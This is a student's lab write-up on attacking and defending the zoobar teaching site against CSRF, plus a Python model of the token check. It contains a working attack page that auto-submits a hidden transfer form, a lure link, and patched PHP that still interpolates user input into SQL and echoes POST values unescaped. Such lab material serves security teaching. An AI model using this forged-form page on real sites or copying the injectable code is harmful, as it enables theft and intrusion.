Information Security Practice Lab 3: CSRF, XSS and Clickjacking

Posted by 貓耳柯基腿 on 2021-01-05


CSRF

Demonstrate a CSRF attack against the zoobar site and then defend against it. Watch the granularity of the defence: every user must not end up with the same token, and refreshing the page too quickly must not cause legitimate operations to fail.

Setup

First register two accounts on the myzoo site: victim and attack.

Configuration of the VM hosting the attacker's server (10.211.55.16):

1. Install apache2

sudo apt-get install apache2

2. Disable the firewall

sudo ufw disable

3. Configure hosts

sudo vim /etc/hosts
Append at the end:
10.211.55.14  www.myzoo.com  # use the IP address of the myzoo server here
127.0.0.1 www.attack.com 

4. Write the index.html file

cd /var/www/html
sudo vim index.html
Paste the following content into the file.

index.html

<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"/>
    <title>my profile</title>
</head>

<body>
<iframe name="it" style="display:none" width="600px" height="450px"></iframe>

<form method="POST"
      name="transferform"
      action="http://www.myzoo.com/transfer.php"
      target="it"
      id="transferform"
      style="display:none">

    <input name="zoobars" type="text" value="1" size="5">
    <input name="recipient" type="text" value="attack"> 
    <input type="hidden" name="submission" value="Send">
</form>

<img src="http://106.13.136.87:8080/101.jpeg">

<script type="text/javascript">
    form = document.getElementById("transferform");
    form.submit();
</script>

</body>
</html>

Configuration of the VM hosting the myzoo site (10.211.55.14):

1. Disable the firewall

sudo ufw disable

2. Configure hosts

sudo vim /etc/hosts
Append at the end:
127.0.0.1  www.myzoo.com
10.211.55.16 www.attack.com # use the IP address of the attacker's server here

Attack

1. In the attack account's profile, enter:

<a href="http://www.attack.com"> 點選檢視我的照片哦</a>

Then click Save.

2. The victim user views attack's profile.
When the victim clicks the link, 1 zoobar is transferred to attack.

Defence

Method 1: use the session

Modify the transfer.php file:

1. Add the following at the top

<?php
  session_start();
?>

2. Change the if statement

// strict comparison; both tokens must be present, otherwise a missing POST
// token would loosely equal (==) a session token that was never set
if($_POST['submission'] && isset($_POST['token'], $_SESSION['csrf']) &&
   $_POST['token'] === $_SESSION['csrf'])

3. Insert the following at lines 45-47

<?php
  $_SESSION['csrf'] = md5(uniqid(mt_rand(), true));
?>

4. Add the following inside the form

<input type=hidden name=token value="<?php echo $_SESSION['csrf']?>"/>

The modified transfer.php is as follows:

<?php
  session_start();
?>

<?php 
  require_once("includes/common.php"); 
  nav_start_outer("Transfer");
  nav_start_inner();
  // strict comparison; both tokens must be present, otherwise a missing POST
  // token would loosely equal (==) a session token that was never set
  if($_POST['submission'] && isset($_POST['token'], $_SESSION['csrf']) &&
     $_POST['token'] === $_SESSION['csrf']) {
    $recipient = $_POST['recipient'];
    $zoobars = (int) $_POST['zoobars'];
    $sql = "SELECT Zoobars FROM Person WHERE PersonID=$user->id";
    $rs = $db->executeQuery($sql);
    $rs = mysql_fetch_array($rs);
    $sender_balance = $rs["Zoobars"] - $zoobars;
    $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
    $rs = $db->executeQuery($sql);
    $rs = mysql_fetch_array($rs);
    $recipient_exists = $rs["PersonID"];
    if($zoobars > 0 && $sender_balance >= 0 && $recipient_exists) {
      $sql = "UPDATE Person SET Zoobars = $sender_balance " .
             "WHERE PersonID=$user->id";
      $db->executeQuery($sql);
      $sql = "SELECT Zoobars FROM Person WHERE Username='$recipient'";
      $rs = $db->executeQuery($sql);
      $rs = mysql_fetch_array($rs);
      $recipient_balance = $rs["Zoobars"] + $zoobars;
      $sql = "UPDATE Person SET Zoobars = $recipient_balance " .
             "WHERE Username='$recipient'";
      $db->executeQuery($sql);
      $result = "Sent $zoobars zoobars";
    }
    else $result = "Transfer to $recipient failed.";
  }
?>
<p><b>Balance:</b>
<span id="myZoobars">  <?php 
  $sql = "SELECT Zoobars FROM Person WHERE PersonID=$user->id";
  $rs = $db->executeQuery($sql);
  $rs = mysql_fetch_array($rs);
  $balance = $rs["Zoobars"];
  echo $balance > 0 ? $balance : 0;
?> </span> zoobars</p>

<?php
  // a fresh token is generated on every render, so a form loaded earlier
  // becomes invalid as soon as the page is refreshed
  $_SESSION['csrf'] = md5(uniqid(mt_rand(), true));
?>

<form method=POST name=transferform
  action="<?php echo $_SERVER['PHP_SELF']?>">
<p>Send <input name=zoobars type=text value="<?php 
  echo $_POST['zoobars']; 
?>" size=5> zoobars</p>
<p>to <input name=recipient type=text value="<?php 
  echo $_POST['recipient']; 
?>"></p>
<input type=hidden name=token value="<?php echo $_SESSION['csrf']?>"/>
<input type=submit name=submission value="Send">
</form>
<span class=warning><?php 
  echo "$result"; 
?></span>
<?php 
  nav_end_inner();
?>
<script type="text/javascript" src="zoobars.js.php"></script>
<?php
  nav_end_outer(); 
?>
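As an added example (not part of this write-up and not zoobar code), the following Python model reproduces the token check above and the two caveats from the task description: tokens must differ between users, and a token that is regenerated on every render invalidates a form that was loaded before a refresh, while a token kept for the whole session does not. The `session` and `post` dicts are constructed stand-ins for PHP's `$_SESSION` and `$_POST`; the forged form mirrors the one served from www.attack.com, which carries no token field.

```python
import hmac
import secrets

# Constructed stand-ins for PHP's $_SESSION (one dict per logged-in user)
# and $_POST (the fields a submitted form carries).


def issue_token(session, per_request=False):
    """Store a CSRF token in the session and return it.

    per_request=False keeps one token for the life of the session;
    per_request=True replaces it on every call, which is what transfer.php
    does by regenerating $_SESSION['csrf'] before printing the form.
    """
    if per_request or "csrf" not in session:
        session["csrf"] = secrets.token_hex(16)
    return session["csrf"]


def verify_transfer(session, post):
    """Decide whether a POSTed transfer may proceed.

    Mirrors the strict PHP condition: the submission flag must be present,
    both tokens must exist, and they must match. compare_digest keeps the
    comparison constant-time, like hash_equals() in PHP.
    """
    if not post.get("submission"):
        return False
    token = post.get("token")
    expected = session.get("csrf")
    if not isinstance(token, str) or expected is None:
        return False
    return hmac.compare_digest(token, expected)


def render_transfer_form(session, per_request=False):
    """Return the fields the browser would send back from the rendered form,
    including the hidden token field that transfer.php adds."""
    return {
        "zoobars": "1",
        "recipient": "attack",
        "submission": "Send",
        "token": issue_token(session, per_request),
    }


def scenario():
    """Run the attack and defence cases and return the outcomes by name."""
    victim, attacker = {}, {}
    results = {}

    # The form served from www.attack.com carries no token field at all.
    forged = {"zoobars": "1", "recipient": "attack", "submission": "Send"}
    results["forged_before_visit"] = verify_transfer(victim, forged)

    victim_form = render_transfer_form(victim)
    results["forged_after_visit"] = verify_transfer(victim, forged)

    # A token issued to a different session must not be accepted either:
    # this is the "everyone gets the same token" granularity problem.
    attacker_form = render_transfer_form(attacker)
    results["tokens_differ"] = attacker_form["token"] != victim_form["token"]
    results["cross_user_token"] = verify_transfer(
        victim, dict(forged, token=attacker_form["token"]))

    # The victim's own form submits normally.
    results["legit"] = verify_transfer(victim, victim_form)

    # Refresh before submitting: per-request tokens invalidate the first
    # form, per-session tokens do not.
    s = {}
    first = render_transfer_form(s, per_request=True)
    render_transfer_form(s, per_request=True)   # page refreshed
    results["stale_after_refresh_per_request"] = verify_transfer(s, first)

    s = {}
    first = render_transfer_form(s)
    render_transfer_form(s)                     # page refreshed
    results["stale_after_refresh_per_session"] = verify_transfer(s, first)
    return results


if __name__ == "__main__":
    for name, ok in scenario().items():
        print(f"{name}: {ok}")
```

Running the block prints one line per case. The per-session policy is the one that satisfies both caveats: each user still gets a distinct token, and a refresh between loading and submitting the form no longer fails the transfer.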
